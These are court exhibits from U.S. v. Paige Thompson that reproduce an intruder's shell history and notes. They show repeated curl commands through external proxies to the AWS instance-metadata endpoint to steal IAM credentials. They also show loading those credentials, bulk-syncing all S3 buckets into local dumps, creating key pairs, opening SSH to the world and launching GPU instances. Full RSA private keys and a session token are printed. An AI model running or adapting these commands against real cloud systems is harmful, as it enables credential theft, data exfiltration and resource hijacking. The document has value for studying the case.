```
1   eval `torsocks curl -vvv --connect-timeout 2 -m 20 --fail -L -k -s --proxy-insecure --proxy http://107.23.47.250:80
    http://169.254.169.254/latest/meta-data/iam/security-credentials/             |                  | awssession.sh`
2
3   torsocks aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --tag --verbose dir='"         /{}"' \; mkdir -p \"$\{dir\}\" '&&' cd
    \"$\{dir\}\" '&&' torsocks aws s3 sync s3://{} .
4
5   /home/erratic/s3_scrapes/
6
7
8   eval `curl -vvv --connect-timeout 2 -m 20 --fail -L -k -s --proxy-insecure --proxy http://54.215.186.6:80
    http://169.254.169.254/latest/meta-data/iam/security-credentials/            |                  | awssession.sh`
9
10  aws ec2 create-key-pair --key-name default --region eu-north-1
11  {
12      "KeyFingerprint": "8a:fa:af:21:44:df:9a:2b:87:26:5a:73:f6:64:62:34:52:6a:b7:87",
13      "KeyMaterial": "-----BEGIN RSA PRIVATE
    KEY-----\nMIIEowIBAAKCAQEAkEw6xoVxrtnOPMR3CykEIK6fCH0kdEhM9qvK9gs5FaUwGFiVbnzENdKNChfO\nf0shtOEM6bXLXbIJOdCqFkIZdIhnjv8iyS9eUkrXxTPPNW/ordZ2afd3pLnHIWMH
    +iYXrHFPFpRl\nKUijhD4PaUUGcJBclp/ckG7WCyCDzuTcrmPAUF5vosM7cNZ36mToBv+GqZYyoOnvzgL3qtghXecX\nRQ5TIJsX7wu8UpoSz34YoFwM70Yt+69aRBqxbvJc19rxUlYpGhE/tkLqqpKB
    vTBBd3QakXu7/XVc\n1R8jyTdS3yD3OytxcpE6gfmw0gcYAY/he0uKTRnxWRiSd00dWsNYLwIDAQABAoIBABYC2tBfmLjQ\nVqpkWbhlGFEX8gBsfnwSblMNX5dqnNmVaiG8mYbSF2gSZxtMCF7Yihq6
    Xark5VG0j722+8sLaDCj\nghCJELhZtmydKA7X2VrQaFDkLwn5CtIg2KRaI+RfnSrb2fe3QgsrHm5UvSsUsWfITadYWV/a2GG4\nIwMTXCpppqTOjILigZg6cun5kqa/pSk+yWw5GmLSrPjnzsD8Di8n
    SCyZzpP9rjf/QDQhZ9oUAp7E\nCIq6xck25RJ4Eb6Ea3/wrhcsysXVd/Jj/YMHQzDY08IMsG6BVp8/hLq2VD9wWdP4xlpcMd5sAYzd\nIYFZH4lxplq7EZWrkVzFPPqE0fkCgYEA898FEOxpMN9QEiP/
    0VaRH/lupem+GeJcfwBXX91YyQhj\n7kO50z9R3JHgs5vJ5uuVqH5rGJ88QjHhl3YHYcscxLR02kO7srxWJWrc32k3gqZyMEVfmj7ozuNI\nvvoBZ4kjChmiq7xE9+mOCvbr/CFSqZL5sXuBHsnci51E9
    MfehcvsCgYEA13lvqoYOIDlGTEJFupHz\nVTn58218BfZg2Wwt8wxiSByEGiSBT84qv1DvPsxpmXTCYTHEcDkndhpZDv8cgB4tcHE3OI/xEUZv\nnOJY9GepYgzLuSMRnQJ9JttTJ0qYtiq109/iq6EUK
    UF006HdTFRD7E9WNfH051xULo0cbOAmJSV0C\nngYBBACSdiiXPfPYen7HD3kr4NsejOVYOGCOHR1QDnC7qBm58R1j0UWBEZil6Mf/yqMBPFML+4RJy\nnolEL2M3G5xhX5bFvq7YPwdtEReNxON4u2KZ+
    7z64IiRzYGk3FYa3paUTpjpJV1MqtfNXFsx7L/Xq\nvEauUyFJFC/zlwu0kchamQKBgEr1DEVwSwO9yEhkbD23dG0rYV7vP2djTreyOXX3JZEqKFcUvatL\n8O7vgZu3Tm9Fv+Z2yP4EBHLszCQSF3Fx
    el4iXH9nDHbSMKP2BPgPWvxj71WkZrkZCUWRKMkyyUnK\nR79kAH0fxd2+eC6I8VdiMe+4o2BuOk9t2Hey7M5kSLExAoGBAIytkSBtU1338e310LRPILhBOOHI\nsSvUgL7vx3PF09J6tRkOkrBaiKnir
    2NrY+RFe5ZC8o50Iyw9kB8FWNkPKCCxmsnZThT9jjls9TiP+\nnblyEZ+4Pm8enGS+csXnXblhQVwu2cU5N4xKx+SQUnz0JgJJJLgksYXB4msI7oXYGLr5v\n-----END RSA PRIVATE KEY-----",
14      "KeyName": "default"
15  }
16
17
18  keypair exists
19  eval `curl -vvv --connect-timeout 2 -m 20 --fail -L -k -s --proxy-insecure --proxy http://52.79.116.117:3128
    http://169.254.169.254/latest/meta-data/iam/security-credentials            |                  | awssession.sh`
20
21  keypair exists
22  eval `curl -vvv --connect-timeout 2 -m 20 --fail -L -k -s --proxy-insecure --proxy https://13.115.217.130:8443
    http://169.254.169.254/latest/meta-data/iam/security-credentials/            |                  | awssession.sh`
23
24  keypair exists
25  eval `curl -vvv --connect-timeout 2 -m 20 --fail -L -k -s --proxy-insecure --proxy https://18.138.232.90:8443
    http://169.254.169.254/latest/meta-data/iam/security-credentials/            |                  | awssession.sh`
26
27  s3 list buckets works
28  eval `curl -vvv --connect-timeout 2 -m 20 --fail -L -k -s --proxy-insecure --proxy http://63.35.93.108:8888
    http://169.254.169.254/latest/meta-data/iam/security-credentials/            |                  | awssession.sh`
29
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 674
Admitted_____

```
    aws.commands.txt

        -Lsk --fail --proxy-insecure --proxy http://54.249.29.154:80 http://{}:9000
369   4480  curl -Lsk --fail --proxy-insecure --proxy https://34.234.188.25:443
      http://169.254.169.254/latest/meta-data/iam/security-credentials/          | awsession.sh
370   4485  less awscli.conf
371   4524  aws organizations
372   4525  aws organizations help
373   4526  less ./aws-athena-query-results-427884659784-us-east-1/Unsaved/2018/09/17/d8f744df-b96c-4783-b423-c123a7b1a92a.csv
374   4527  less ./aws-athena-query-results-427884659784-us-east-1/Unsaved/2017/06/26/8167b408-5cfc-44e9-a318-30b6b5064920.txt.metadata
375   4618  less
376   4619  less                     key
377   4644  aws s3api sync
378   4645  aws s3 sync
379   4646  aws s3 sync --help
380   4647  aws s3 sync
381   4648  aws s3 sync help
382   4657  echo '{\n  "Code" : "Success",\n  "LastUpdated" : "2019-03-22T17:07:39Z",\n  "Type" : "AWS-HMAC",\n  "AccessKeyId" :
            5KNF",\n  "SecretAccessKey" :                         PNOa,\n  "Token" :
      "FQoGZXIvYXdzEPv//////////wEaDO6lOtGs+VmBMYgRfiK9A0YN+3CnnnDF2jhOCkrSS5CRUCpolcqx/Ihn1YD4FP2rtAGOYujOhBQM4cPt0IB8NOsXu/wGMfWJ8k4JPFe8Pvr3oPH9dvaX5bg
      ml0gvZ2Y6I8Ulh7+xtScEpNS88ikNBgf9UIouOcW+s4omAfmM+ffzd489SHoUySujgpyP+FDor09EoQZxxcvonBXSmXNk6vScIMVRqoVmV8621M4iEzZWKDmLMGlWi9Sa/G2QUZoz2ekgIMH2sRX
      kDI1Uqd/TgcI6T6lsm2YeRgctpblgazvgt8kofOqsU+DoXrymrI2N6U/VU54PdW1WUEkBRgSmToQa9hvTD9rNwDwrwwXSEABACx4NHRBp9v/F26n7K4y4YvqLiBWLSVCvsF2VJcJo7oqVotefr4l
      FeBlXRWif/n26abhdE4pacHGPSsTZLdD/ihzfvxqqjaus8U2siIeeE0iEr9VakH9QOr+WfZAiCaN5IUQXHbmt40NGB1f++4b7EUy9IztVftaxOijHJKX1PSHRLgl4MTK2DcRDpPrTmx/ojG2N0Qc
      j+ThhQTnTZGgPjqslr2M4ry6VUTHtsaG7q/aKLGAuHKporX6UmzYolKzU5AU=",\n  "Expiration" : "2019-03-22T23:40:17Z"\n}'  | awssession.sh
383   4662  aws ec2 describe-instances
384   4663  aws ec2 describe-instances                 | less
385   4664  aws ec2 create-key-pair                    --key-name default
386   4711  curl -Lsk --fail --proxy-insecure --proxy https://34.234.188.25:443
      http://169.254.169.254/latest/meta-data/iam/security-credentials/          | awssession.sh
387   4719  aws s3api list-buckets | jq -r '.Buckets | .[] | .Name' | parallel --verbose dir='          {}"' \; mkdir -p \"$\{dir\}\" '&&' cd
      \"$\{dir\}\" '&&' aws s3 sync s3://{} .
388   4729  mkdir aws_dumps
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 675
Admitted_____

```
notes2

52
53   ---
54
55    eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://18.195.126.53:443
      http://169.254.169.254/latest/meta-data/iam/security-credentials/                | awssession.sh`
56   An error occurred (UnauthorizedOperation) when calling the CreateKeyPair operation: You are not authorized to perform this operation.
57
58   ----
59
60    eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://54.245.71.151:443
      http://169.254.169.254/latest/meta-data/iam/security-credentials/                | awssession.sh`
61   An error occurred (UnauthorizedOperation) when calling the CreateKeyPair operation: You are not authorized to perform this operation.
62
63   ---
64
65   eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://99.80.218.255:8888
      http://169.254.169.254/latest/meta-data/iam/security-credentials/      | awssession.sh`
66
67   aws ec2 run-instances --region us-west-2 --instance-type p3.16xlarge --count 2 --image-id ami-        8109 --associate-public-ip-address
      --security-group-ids sg-9916c8e8 --instance-initiated-shutdown-behavior terminate --key-name default
68
69
70   ---
71
72   eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://34.210.6.139:443
      http://169.254.169.254/latest/meta-data/iam/security-credentials/      | awssession.sh`
73
74   aws ec2 run-instances --region eu-west-1 --instance-type p3.8xlarge --count 2 --image-id ami-        4a80 --associate-public-ip-address
      --security-group-ids sg-af48b0c8 --instance-initiated-shutdown-behavior terminate --key-name default
75
76   An error occurred (InstanceLimitExceeded) when calling the RunInstances operation: You have requested more instances (2) than your current instance limit
     of 1 allows for the specified instance type. Please visit http://aws.amazon.com/contact-us/ec2-request to request an adjustment to this limit.
77
78
79   ---
80
81   well then...
82   eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://13.230.72.193:8118
      http://169.254.169.254/latest/meta-data/iam/security-credentials/      | awssession.sh`
83
84   ----
85
86   http://54.168.64.184:3128          "InstanceProfileArn" : "arn:aws:iam::      3586:instance-profile/
87
88
89   Another unfixed previously used account
90   eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://18.208.62.195:443
      http://169.254.169.254/latest/meta-data/iam/security-credentials/      | awssession.sh`
91
92   An error occurred (InvalidKeyPair.Duplicate) when calling the CreateKeyPair operation: The keypair 'default' already exists.
93
```

```
 1
 2     ░░░░░░░░░░░
 3     eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.27.111.81:443
       http://169.254.169.254/latest/meta-data/iam/security-credentials/░░░░░ | awssession.sh`
 4
 5
 6     sg-0151b864
 7
 8     weird system maanager role
 9     eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://34.240.191.55:443
       http://169.254.169.254/latest/meta-data/iam/security-credentials/░░░░░░░░░░ | awssession.sh`
10
11
12     weird ░░ role
13     eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://52.59.52.123:443
       http://169.254.169.254/latest/meta-data/iam/security-credentials/░░ | awssession.sh`
14
15     not sure
16
17     eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://34.226.250.30:443
       http://169.254.169.254/latest/meta-data/iam/security-credentials/░░░░░░░░ | awssession.sh`
18
19     ░░░░░░░?
20      curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://54.153.227.199:443
       http://169.254.169.254/latest/meta-data/iam/security-credentials/░░░░░░░░░ | awssession.sh
21
22      ec2 read access and s3api read
23       curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://3.104.68.8:443
        http://169.254.169.254/latest/meta-data/iam/security-credentials/░░░░░░░
24
25
26      guess whos back
27      eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy http://13.113.12.133:80
       http://169.254.169.254/latest/meta-data/iam/security-credentials/░░░░░░ | awssession.sh`
28
29
30      apperian ░░░░░░░ / s3api limited |
31       eval `curl -vvv --fail -s -L --proxy-insecure -m 5 --connect-timeout 2 --proxy https://54.77.46.101:443
       http://169.254.169.254/latest/meta-data/iam/security-credentials/░░░░░░░ | awssession.sh`
32
33
```

```
eval `curl -vvv --connect-timeout 2 -m 20 --fail -L -k -s --proxy-insecure --proxy http://54.215.186.6:80
http://169.254.169.254/latest/meta-data/iam/security-credentials/▓▓▓▓▓▓ | ▓▓▓▓▓▓▓▓ |
awssession.sh`

aws ec2 create-key-pair --key-name default --▓▓▓▓▓
{
    "KeyFingerprint": "2f:80:17:6e:89:68:09:bc:03:6a:c2:68:bd:2e:7a:91:59:49:1a:46",
    "KeyMaterial": "-----BEGIN RSA PRIVATE
KEY-----\nMIIEpAIBAAKCAQEAmOeCNubVYZUpjVGcTthI5d/PxLiDn/SrgzHNLijwBRPvSqfj8mrXXRhTGJov\npBANy2XNh/QCBcs9pb8
VP5UGeVbh1SSlB21UXkVdUIThw3uD06uCZJteYNCIKkVp6n4NmZn2spfD\nhtcnSiYWzsC1dMhh/uKYbb1miZE9meXQWeHFAYENuhBvaDuf
9gOK5FfGLG7KT2nPoq9+/sKsbR8m\ne42umQyxH0gE95TmU8qJUZwbCVBW+XSUA3UGeyuw+6S+wymYirujvSr+muyDPU5pR1EYPAYFZxJt\
nDPjVWORcIDM9TRe8l62H4335kWasJn/8FduMLlgsS/BJDyrchQ/K1QIDAQABAoIBAQCIQfZ2Omp4\n1VX8C3gBgxgjUblzEwKo7n5RIXY4
5l5OCB+8JbUqeC+HVH/ocq51w6CnWwc3WijbROyg4ZFr4b+t\nLdF+AXPXFISUpbesY15Ut6MYY8SFJzeJiwtssALc5ov0D5IaQMgLR3xJx
XuZr32EnnVFkGRJlvjj\nKrz8giGTlgdiBBRHdTrrQsTkv/4Ugug2YbINKuelsq2J7SpzcaZKqRzhXrzMUZJv4yZJtSk0eFf+\nwBD+4B+b
uqds26KyxlfizOaY+GsbxgxsGxB8gA1xf2E8oNE5CuHlCoTzpaS0/8yLaDAjEUgzhCpz\nINmDgAJE0LqVPSMA5DHiOzjQki+ZAoGBAPQ+N
mdBjxo/heEB6EsQdZ+EAWVH6NqERBqNRpAWiAL4\ni3T1Of2SS3G4w9etfmd8ZNi+Kig2qCpRajMYUmDfL8PYGHzxHcz3qNKJsedz9C5sEx
tKzyo3CIDD\nQ9qouRY2JJ4Lzhwl4x4yxkMTOZtxTAXvVW9LeKFrZzDKKVq5emUbnAoGBAKBDvJdk0SujH1my51iZ\nuo6OgRVBlqkbmprkM
hK+onU1WtMeW84TEtSxLEH5wE5cdq9Um7h3T60oJdTMutvjOPokSNCZt6Fu\n7lhZDIuI5Xt8xqjcD0iN7BXbmMGheDSComoBYqQLhrciel
NnpK2JnkOib/+zwvfcqVBgxlm0aTTj\nAoGAQaHyJp8kYE5PoJ5NmNZMdVgYs+m19fpy/puWKaQUWpAFkaFQOwa0BVQ8NFnnzNFNnDzFwVa
m\nq/CC1EYl5Og0wrDwK6rzch/fGuxrhSHQrSTXoY7hyptNSqTeRO74O8duea8NS4tMPE9+8pPwaiZY\nELnN2gVe3MMIL1CjaGn9UGMCgY
AAw/INowygsbm/muwh7zIF5kZVjKekjR4y6S4YCtMJzkRtx7JW\njJ7FZ0c31XKGrUhf0/6eZet6fzuXBZdK343xG+VBIcrPuZDn2R0HOZM
nANSOD+b+yLa87/yNyDCj\nx4/xA6qt7+Qn0cFVzqPptEOOPSNdzET9HA+u85de7E6oUwKBgQChVew5QduzzOAKk1mbxUl5Ls/B\npuSboC
I5ekW/VcNJlKmm++XRz4lPRpUgVQ6Q9tGYbBtT6TtMpRGKxDBZv0h7OSKSR9mohDUFHgKE\nFCfxDNiEsw2jz5C3kC79KykVSdwcRmAqRlW
xpn1hLA1KNiXPeB3oeFl33F85bYTUCEUVMQ==\n-----END RSA PRIVATE KEY-----",
    "KeyName": "default"
}

 aws ec2 --region eu-west-2 create-security-group --group-name reserved --vpc-id ▓▓▓▓7574 --description
"No description specified"
{
    "GroupId": "sg-▓▓▓▓▓▓▓301d"
}



aws ec2 run-instances --region eu-west-2 --instance-type p3.16xlarge --count 2 --image-id
ami-▓▓▓▓▓▓▓▓6eab --associate-public-ip-address --security-group-ids sg-▓▓▓▓▓▓301d
--instance-initiated-shutdown-behavior terminate --key-name default
```

U.S. v. Paige Thompson
CR19-159 RSL
Plaintiff's Exhibit No. 803
Admitted_____

```
aws ec2 run-instances --region eu-west-2 --instance-type p3.8xlarge --count 2 --image-id
ami-          6eab --associate-public-ip-address --security-group-ids              301d
--instance-initiated-shutdown-behavior terminate --key-name default

aws ec2 run-instances --region eu-west-2 --instance-type p3.2xlarge --count 2 --image-id
ami-          6eab --associate-public-ip-address --security-group-ids              301d
--instance-initiated-shutdown-behavior terminate --key-name default


aws ec2 authorize-security-group-ingress --group-id           301d --protocol tcp --port 22 --cidr
0.0.0.0/0 --region eu-west-2

aws ec2 describe-instances --region eu-west-2 |                  | .[] | .Instances | .[] |
.PublicIpAddress'
35.178.179.237
35.178.115.79
18.130.229.26
3.8.151.175
18.130.200.182
3.8.138.77


bootstrapped


----------

eval `curl -vvv --connect-timeout 2 -m 20 --fail -L -k -s --proxy-insecure --proxy http://13.235.73.204:80
http://169.254.169.254/latest/meta-data/iam/security-credentials/                      |
awssession.sh`

aws ec2 create-key-pair --key-name default --
{
    "KeyFingerprint": "65:c9:55:19:11:c3:6f:4e:09:18:07:35:18:9d:ba:03:c6:ff:86:65",
    "KeyMaterial": "-----BEGIN RSA PRIVATE
KEY-----\nMIIEogIBAAKCAQEAgEwubRlZDue+zbZf6tYHj9NurUG8/gmmbwL78ewOULM2asaWuyXaF3cbvOHQ\n+r+3HNPE6e2XMEGEerr
3h3z7z5IW0s4VtxtCovulWlp4mCqASbUQhsF941C/I/kHYkadjZAnj6H/\n1eU82N6HeYcobbb2DqwvtTJIAwTrVHmC+Si7992Ath7x/JJA
g1Mr5wQGMOd4XV6OS3+oCHyysszK\n9laas51TiIr+qQSmF6dq05anEuEXCl8vU6cUeZuqK9kUXeujWhAldFuFmLJkX4fZOBcrnUvs4i1u\
nNXqtN1iKcbrMP5HdWoAxqIdQO4GK/Kt5Nc9ush+u/yOFVNzumRZJ4QIDAQABAoIBAEjqAuCiLUkZ\nUAkdgvm11epZoWb6G2zNEze4HHPr
```

Ul9u2phocLW/12jKmosIU3qOhoTtndXM38XfFmmh5Jet4naf\ncjUwRosgBQkXt2vYSv0+lTpgJD1WpRcCaVqHFYwB86yhKlOylVHyQL/x
UK+G63u83x3Q03ZW6/L\nlesWe+cZ/ze7B2+JAo887UUBW2Eu36FKBQF2jJOxKvdjj8s7/LcBzo/5inu3xtYLoBTt55qwnXja\nVbxtWzc0
UyoN9F6vNJe83V4kNX1/mj1YORuqeJaMQBNuFHOrdTsi9717hrvIw6jcRTNQ++lHBpFh\neziMO9yZGJ7kmfiJzYnZt253pgECgYEAvWR97
iail0pBydYcbgIFcX79q5NB3iaqqi8XVmpJ3kIA\n/HSWtB4EmhX5dSH3lyDHRIm+aY1BcVhJDZm4Dn6KtYWNVuN+r1x8B7aoD4ntxVnKNl
m6YiPubJUr\nTArWTINgDyQZs9JkD+blLyktlsnHYc9lRPXlFvIyQwo2O3EmypECgYEArWsmSHaaBLl+VPwLndWH\nKO98auCMoASED8/ds
9QwxrdXYXJ6ZGFXLwwF4l4T0J185DIfLpqUv13PCKi0A9fXLhgEowSAzZrp\nDBxkDSI6OM/R4cKLGH+JFGnb6szWq8whFwZ+J79bBvLy+R
uexYsM+HN7IaqK5QzgD8abo41yElEC\ngYBuYkS3ahM3pFMFxWIah9kOVlqZBqHMTbMIr5ulhRt6i/OxMG6pmhlKiWY0a9C3Z6Zcfv/Y2zh
6\nTF9/qslIwV4tACLpsnwizv+HK2F2dQh9DqE53kAwdQrAhIyQrHxMagGxsXO9h/FEB2oqe5CToxUv\nH8bBU6PrJMxAoJINQRy/0QKBgD
ULR0R28plrW5cHGU6H17XPuxC96oWvm+1yOXAeAWVnAxVNfN5j\nX9WGKe6ZtBnlciQiqKMKqWD3grI1WAqs5Ka2tgRfBj7dmVcZAAl8ZK6
n8pzJct5ldDqIPrpNOYSH\nbCATPldOErvHaEaGCkSGSctdF1au4Zk6HPb2Wvjl9PRhAoGAWoVaBZhNqMnSmJhsAQ7ournwCgGM\nTuNoVj
VxniM15zRzJS2hdfXh7FPiCIiPVqbY99LEoe1Tlpfx61zgE/BmLwc6SlEboat2EsQC7u7m\ng5Bfjh/Bd8m8MPiYkbGMnR/lqcYComjEA9d
8ff+j383iAEDObAg8iW48FfX0FCOKyfY=\n-----END RSA PRIVATE KEY-----",
        "KeyName": "default"
}

```
echo -e "-----BEGIN RSA PRIVATE
KEY-----\nMIIEogIBAAKCAQEAgEwubRlZDue+zbZf6tYHj9NurUG8/gmmbwL78ewOULM2asaWuyXaF3cbvOHQ\n+r+3HNPE6e2XMEGEerr
3h3z7z5IW0s4VtxtCovulWlp4mCqASbUQhsF941C/I/kHYkadjZAnj6H/\n1eU82N6HeYcobbb2DqwvtTJIAwTrVHmC+Si7992Ath7x/JJA
g1Mr5wQGMOd4XV6OS3+oCHyysszK\n9laas51TiIr+qQSmF6dq05anEuEXCl8vU6cUeZuqK9kUXeujWhAldFuFmLJkX4fZOBcrnUvs4i1u\
nNXqtN1iKcbrMP5HdWoAxqIdQO4GK/Kt5Nc9ush+u/yOFVNzumRZJ4QIDAQABAoIBAEjqAuCiLUkZ\nUAkdgvm11epZoWb6G2zNEze4HHPr
Ul9u2phocLW/12jKmosIU3qOhoTtndXM38XfFmmh5Jet4naf\ncjUwRosgBQkXt2vYSv0+lTpgJD1WpRcCaVqHFYwB86yhKlOylVHyQL/x
UK+G63u83x3Q03ZW6/L\nlesWe+cZ/ze7B2+JAo887UUBW2Eu36FKBQF2jJOxKvdjj8s7/LcBzo/5inu3xtYLoBTt55qwnXja\nVbxtWzc0
UyoN9F6vNJe83V4kNX1/mj1YORuqeJaMQBNuFHOrdTsi9717hrvIw6jcRTNQ++lHBpFh\neziMO9yZGJ7kmfiJzYnZt253pgECgYEAvWR97
iail0pBydYcbgIFcX79q5NB3iaqqi8XVmpJ3kIA\n/HSWtB4EmhX5dSH3lyDHRIm+aY1BcVhJDZm4Dn6KtYWNVuN+r1x8B7aoD4ntxVnKNl
m6YiPubJUr\nTArWTINgDyQZs9JkD+blLyktlsnHYc9lRPXlFvIyQwo2O3EmypECgYEArWsmSHaaBLl+VPwLndWH\nKO98auCMoASED8/ds
9QwxrdXYXJ6ZGFXLwwF4l4T0J185DIfLpqUv13PCKi0A9fXLhgEowSAzZrp\nDBxkDSI6OM/R4cKLGH+JFGnb6szWq8whFwZ+J79bBvLy+R
uexYsM+HN7IaqK5QzgD8abo41yElEC\ngYBuYkS3ahM3pFMFxWIah9kOVlqZBqHMTbMIr5ulhRt6i/OxMG6pmhlKiWY0a9C3Z6Zcfv/Y2zh
6\nTF9/qslIwV4tACLpsnwizv+HK2F2dQh9DqE53kAwdQrAhIyQrHxMagGxsXO9h/H8bBU6PrJMxAoJINQRy/0QKBgD
ULR0R28plrW5cHGU6H17XPuxC96oWvm+1yOXAeAWVnAxVNfN5j\nX9WGKe6ZtBnlciQiqKMKqWD3grI1WAqs5Ka2tgRfBj7dmVcZAAl8ZK6
n8pzJct5ldDqIPrpNOYSH\nbCATPldOErvHaEaGCkSGSctdF1au4Zk6HPb2Wvjl9PRhAoGAWoVaBZhNqMnSmJhsAQ7ournwCgGM\nTuNoVj
VxniM15zRzJS2hdfXh7FPiCIiPVqbY99LEoe1Tlpfx61zgE/BmLwc6SlEboat2EsQC7u7m\ng5Bfjh/Bd8m8MPiYkbGMnR/lqcYComjEA9d
8ff+j383iAEDObAg8iW48FfX0FCOKyfY=\n-----END RSA PRIVATE KEY-----" > ~/
```

```
aws
{
    "Vpcs": [
        {
            "CidrBlock": "172.31.0.0/16",
            "DhcpOptionsId": "dopt-6c106d0a",
```

```
            "State": "available",
            "VpcId": "vpc-c3a8aba5",
            "OwnerId":            7067",
            "InstanceTenancy":
            "CidrBlockAssociationSet": [
                {
                    "AssociationId":                    df1f",
                    "CidrBlock": "172.31.0.0/16",
                    "CidrBlockState": {
                        "State": "associated"
                    }
                }
            ],
            "IsDefault": true
        }
    ]
}

 aws ec2 --region eu-west-1 create-security-group --group-name reserved               --description
"No description specified"
{
    "GroupId":                    ee47"
}

aws ec2 authorize-security-group-ingress --group-id              ee47 --protocol tcp --port 22 --cidr
0.0.0.0/0 --region eu-west-1

aws ec2 run-instances --region eu-west-1 --instance-type p3.16xlarge --count 2 --image-id
ami-            4a80 --associate-public-ip-address --security-group-ids               ee47
--instance-initiated-shutdown-behavior terminate --key-name default

An error occurred (PendingVerification) when calling the RunInstances operation: Your request for accessing
resources in this region is being validated, and you will not be able to launch additional resources in
this region until the validation is complete. We will notify you by email once your request has been
validated. While normally resolved within minutes, please allow up to 4 hours for this process to complete.
If the issue still persists, please let us know by writing to aws-verification@amazon.com for further
assistance.
```

```
pending.....

---------------

eval `curl -vvv --connect-timeout 10 -m 20 --fail -L -k -s --proxy-insecure --proxy
https://34.230.190.74:443 http://169.254.169.254/latest/meta-data/iam/security-credentials/▓▓▓▓▓▓▓▓▓ |
▓▓▓▓▓▓▓▓▓  | awssession.sh`

aws ec2 --region us-west-2 create-security-group --group-name reserved --vpc-id ▓▓▓▓▓▓▓▓ --description
"No description specified"
{
    "GroupId": "sg-▓▓▓▓▓▓▓▓40f2"
}

aws ec2 authorize-security-group-ingress --group-id sg-▓▓▓▓▓▓▓▓40f2 --protocol tcp --port 22 --cidr
0.0.0.0/0 --region us-west-2


aws ec2 create-key-pair --key-name default --region us-west-2
{
    "KeyFingerprint": "b6:a4:9e:e2:da:4d:80:d4:15:4a:26:ae:7d:8b:8e:93:be:1b:42:ac",
    "KeyMaterial": "-----BEGIN RSA PRIVATE
KEY-----\nMIIEpAIBAAKCAQEAohqf5ApqywPJiSbJ5W1eRaMjsrNEpFiAKR6Wd2RT7MRQxNHu/s4RKZw55dYS\nqpfeILoH6GmOIkvNqwS
cemtRSFOjvJLJvrvQiVOr4ilaeVLGndj5T/D+QF6yFrtv40EIyIIeI3b7\nyzzUAmDWF1Ju2Xj+JE1CTJWTsYHmdoYzv11mw+XOPpcxSCXm
satEUZAFM3HQuxilctPukfx8bs+t\n0hbjbx6Rh7cWs4AoFx7M48wWoQEPOKed36BZNVlPU9gST5VeI+Dy+cjBVWSOnkucvybhRILJ2tcD\
nKoHIpXs5y765+cnmn/7dw0MYrgl+gl2LflmyocleEl1664wWfe4xyQIDAQABAoIBAARklFCpt5so\nzx1YX8BH5nYcpasCEKoje9WhbpJt
tZiE+WtcBQ4Cp5RpF2iTFI5q7yoT4IL72U40n64ywcrPfbRo\nD9fcYns4u7389nt6g2kmRRuh9Z+k+D7mUg0rpyyRZpuIayiq4MfxLg2i
irPoRFjpf912IYax5XX\n31b27BATfLsIyzZzAqZWtdwCy9el8y5t2p+VEX+4H+MB17yw8VSHD3HTCcBMlYtOlEYMEl0XM1Na\nBT1B3XUg
Zn4Lx2I1ODNjBonH2js0T44dnTTNTFzh/yw4Hv6ENoZFcg8PtjgvLit2+NPtHeDzT8t4\nbTNhOcyFioktxj2/n5q03hS/wAECgYEA7LTyC
KoojWYKXZ5toRxWyq/g6xic9sCgVA0sfCoIhz/j\nZDoHj8faVBgFYuslAKqs85akHVN8N+ijIxIzoBvxDa0vXnf26pSuDaLC8klwImHHV4
P43dJ48A6E\nf8GcC3AUuwUp5MKjVV68lT3JSUpRbTFI46OeV8VkLdquXb++UoECgYEAr1EJ7zPSzlr+GfruF1Ly\nenWUNGstHLVtUWsxn
515BX6KKgCNRCa7oS59IxBAFLRIlyQdb7FoH8SPI+kpg7BR6gZB+TaGSIfo\nt/XsFjeq4K5UkzwHJwo2JAxtF87cHRNj5A1A1HlUWouPoZ
iUSpSGwl+cedgRvSTr2EL10whNK0kC\ngYEA68kqt1rYXlFgzfS8e5oBEpGz2DuCT4F9s3wT7fLo3+DSH8p2MdEAOHhdFTXqfAmHknViMRw
y\nRnbj2lGNP1XV/que3dleCjnkTwzsZ/CjVHxV12VMh5nagjXT4nb3e6U/4TO5kXgYvzdJXthXIzx2\nc/B+DNO1LPUhX1PQEO6pJQECgY
BaxU6rdt2S0jH2KaHUmbHKDc6qRUOaNaVgHmwXBGWAnsAHeLYr\nrxI+pd9MpEFJdv6OorhK+EO9Dvw9z58a+9Oto4fNDJoCO7wWY1HVPwV
OR3Sqts3NPNBDYduqFASL\nWVrC3MnQOPGf39qCBInjA3uyb+aIf4LPt6oU0raMiSPLYQKBgQC4Kja8dwkkCaHrQ4B9PdY8pmyS\nqIui5n
5PIcCr5s1DXpRY+OAN/k9bd2nL0dqDNVexGXPkllSl5oD1Zg/mvc2ffP6pNpWDlOLwyHgS\n3Z+klDtgDsM7lCXVj+QoWNFf/YKcHwi7+YU
aem/mpeo0qTD2kGqsl7SNwKV+D2+EiG9Hcw==\n-----END RSA PRIVATE KEY-----",
    "KeyName": "default"
```

```
}

aws ec2 run-instances --region us-west-2 --instance-type p3.2xlarge --count 2 --image-id
ami-          8109 --associate-public-ip-address --security-group-ids sg-          40f2
--instance-initiated-shutdown-behavior terminate --key-name default

aws ec2 run-instances --region us-west-2 --instance-type p3.8xlarge --count 2 --image-id
ami-          8109 --associate-public-ip-address --security-group-ids sg-          40f2
--instance-initiated-shutdown-behavior terminate --key-name default

aws ec2 run-instances --region us-west-2 --instance-type p3.16xlarge --count 2 --image-id
ami-          8109 --associate-public-ip-address --security-group-ids sg-          40f2
